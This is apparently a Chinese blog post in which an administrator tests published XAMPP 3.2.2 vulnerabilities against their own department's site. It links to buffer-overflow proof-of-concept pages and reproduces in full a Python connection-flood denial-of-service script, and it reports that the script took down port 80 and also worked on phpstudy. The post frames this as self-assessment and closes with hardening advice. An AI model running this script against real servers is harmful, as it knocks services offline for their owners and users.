zoukankan      html  css  js  c++  java
  • xampp缺陷

      最近在看通用漏洞,发现我们部门网站使用了xampp3.2.2做网站部署,使用这种继承软件包会有很多问题,在网上搜了搜,发现最近还有公布的漏洞。

      一个是今年9月出的一个XAMPP Control Panel 3.2.2 Buffer Overflow;另一个是几年前的一个远程拒绝服务,就是简单的dos或者cc。

    #0x01 XAMPP Control Panel 3.2.2 Buffer Overflow

      网上共找到两种Poc:

      http://www.vfocus.net/art/20181220/15036.html

      http://www.vfocus.net/art/20180917/14798.html

      下载运行脚本,会生成一个exploit.txt文件。

      在Control Panel里点击右上角的config,将exlpoit里的内容复制到editor和browser里,保存。

    然后点击查看httpd.conf文件,会弹出崩溃。

    崩溃后web进程并没有中断,并没有达成拒绝服务,只是程序崩溃而已,貌似价值不高。

    #0x02XAMPP Control Panel - Denial Of Service

      找到一个poc:

      https://www.anquanke.com/vul/id/1067740

      大体意思就是在xampp监听的这些端口:

    (MySQL) 3306 v3.2.2
    (Tomcat) 8080 (XAMPP v3.1.0)
    (FileZilla) 21
    (Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143.
    

      如果发送大量的垃圾数据,就会造成内存崩溃和拒绝服务。

    POC:

    import socket
    
    print "XAMPP Control Panel DOS"
    print "Discovery: John Page (hyp3rlinx)"
    print "ApparitionSec"
    print "hyp3rlinx.altervista.org
    "
    
    IP = raw_input("[IP]> ")
    PORT = raw_input("[PORT]> ")
    
    arr=[]
    c=0
    while 1:
        try:
            arr.append(socket.create_connection((IP,PORT)))
            arr[c].send("DOOM")
            print "Die!"
            c+=1
        except socket.error:
            print "[+] Done! "
            raw_input()
            break
    

    对xampp的80端口尝试攻击:

    效果显著。中断脚本后,网站即可恢复。

    想到其他建站工具也可能有这种问题,又拿脚本测了下phpstudy,同样可以实现拒绝服务。

    #0x03 

      网站正式部署最好不要用这些集成工具包,一个是很容易由于默认配置遭到入侵,还有这种dos攻击抗性太差。

  • 相关阅读:
    BZOJ 2002 [Hnoi2010]Bounce 弹飞绵羊 ——Link-Cut Tree
    BZOJ 2049 [Sdoi2008]Cave 洞穴勘测 ——Link-Cut Tree
    hdu
    hdu
    hdu
    hdu
    hdu
    hdu
    hdu
    hdu
  • 原文地址:https://www.cnblogs.com/apossin/p/10167920.html
Copyright © 2011-2022 走看看